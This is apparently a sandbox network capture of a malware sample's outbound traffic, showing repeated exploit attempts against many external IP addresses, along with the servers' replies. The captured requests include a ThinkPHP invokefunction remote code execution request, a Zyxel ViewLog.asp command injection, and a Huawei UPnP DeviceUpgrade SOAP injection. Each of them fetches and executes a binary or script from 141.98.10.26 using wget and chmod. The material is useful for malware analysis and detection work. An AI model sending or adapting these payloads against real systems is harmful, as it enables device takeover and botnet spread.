Nov 22, 2023 08:39:23.600250959 CET	11425	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:23 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
569	192.168.2.23	50564	112.34.113.183	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.351223946 CET	11412	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
570	192.168.2.23	47846	95.100.150.46	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.475976944 CET	11415	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:23.658211946 CET	11427	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:39:23 GMT Date: Wed, 22 Nov 2023 07:39:23 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 65 61 35 37 31 64 34 26 23 34 36 3b 31 37 30 30 36 33 38 37 36 33 26 23 34 36 3b 61 61 37 63 64 63 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.9ea571d4.1700638763.aa7cdc1</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
571	192.168.2.23	60048	31.11.8.136	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.493774891 CET	11417	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
572	192.168.2.23	33126	62.29.85.158	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.515443087 CET	11419	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
573	192.168.2.23	54958	95.86.72.190	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.524714947 CET	11420	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
574	192.168.2.23	41576	94.122.91.8	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.526398897 CET	11421	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
575	192.168.2.23	54800	31.200.60.135	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.529618979 CET	11421	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
576	192.168.2.23	52264	94.120.144.221	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.530174971 CET	11422	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
577	192.168.2.23	38666	95.101.50.16	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.581583977 CET	11423	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:23.869709015 CET	11436	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:23 GMT Date: Wed, 22 Nov 2023 07:39:23 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 66 66 35 37 34 36 38 26 23 34 36 3b 31 37 30 30 36 33 38 37 36 33 26 23 34 36 3b 34 32 62 38 36 63 65 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.2ff57468.1700638763.42b86ce1</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
578	192.168.2.23	35542	197.56.131.176	37215

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.590260029 CET	11425	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.26 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Nov 22, 2023 08:39:23.884628057 CET	11436	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/xml; charset="utf-8" Server: Linux UPnP/1.0 Huawei-ATP-IGD EXT: Connection: Keep-Alive Content-Length: 398

Session ID	Source IP	Source Port	Destination IP	Destination Port
579	192.168.2.23	59824	95.58.246.128	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.683018923 CET	11428	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:24.014604092 CET	11444	IN	HTTP/1.1 200 OK
Nov 22, 2023 08:39:24.014683008 CET	11445	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
580	192.168.2.23	58294	31.200.108.79	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.734646082 CET	11430	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
581	192.168.2.23	57900	94.121.139.97	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.742410898 CET	11431	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
582	192.168.2.23	43760	95.104.38.35	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.763488054 CET	11433	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:24.005553007 CET	11444	IN	HTTP/1.1 404 Not Found Server: mini_httpd/1.30 26Oct2018 Date: Wed, 22 Nov 2023 07:39:23 GMT Cache-Control: no-cache,no-store Content-Type: text/html; charset=%s Content-Security-Policy: frame-ancestors 'none' Content-Security-Policy: frame-ancestors 'self' Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 63 63 39 39 39 39 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 0a 20 20 20 20 3c 68 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 20 20 20 20 3c 68 72 3e 0a 0a 20 20 20 20 3c 61 64 64 72 65 73 73 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 33 30 20 32 36 4f 63 74 32 30 31 38 3c 2f 61 3e 3c 2f 61 64 64 72 65 73 73 3e 0a 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head> <meta http-equiv="Content-type" content="text/html;charset=UTF-8"> <title>404 Not Found</title> </head> <body bgcolor="#cc9999" text="#000000" link="#2020ff" vlink="#4040cc"> <h4>404 Not Found</h4>File not found. <hr> <address><a href="http://www.acme.com/software/mini_httpd/">mini_httpd/1.30 26Oct2018</a></address> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
583	192.168.2.23	55316	88.5.23.242	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.775567055 CET	11433	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:23.971678019 CET	11441	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:39:21 GMT Server: X-Frame-Options: SAMEORIGIN Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob: Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
584	192.168.2.23	60072	31.11.8.136	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.908046961 CET	11438	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Server: httpd Date: Wed, 22 Nov 2023 08:39:23 GMT Connection: close Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
585	192.168.2.23	51522	31.173.122.7	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.973133087 CET	11442	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:24.310106993 CET	11532	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=ISO-8859-1 Cache-Control: must-revalidate,no-cache,no-store Content-Length: 1384 Server: Jetty(i-jetty 6.0-1685760949) Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 3c 2f 68 32 3e 0a 3c 70 3e 50 72 6f 62 6c 65 6d 20 61 63 63 65 73 73 69 6e 67 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 2e 20 52 65 61 73 6f 6e 3a 0a 3c 70 72 65 3e 20 20 20 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 72 65 3e 3c 2f 70 3e 3c 68 72 20 2f 3e 3c 69 3e 3c 73 6d 61 6c 6c 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 3c 2f 73 6d 61 6c 6c 3e 3c 2f 69 3e 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 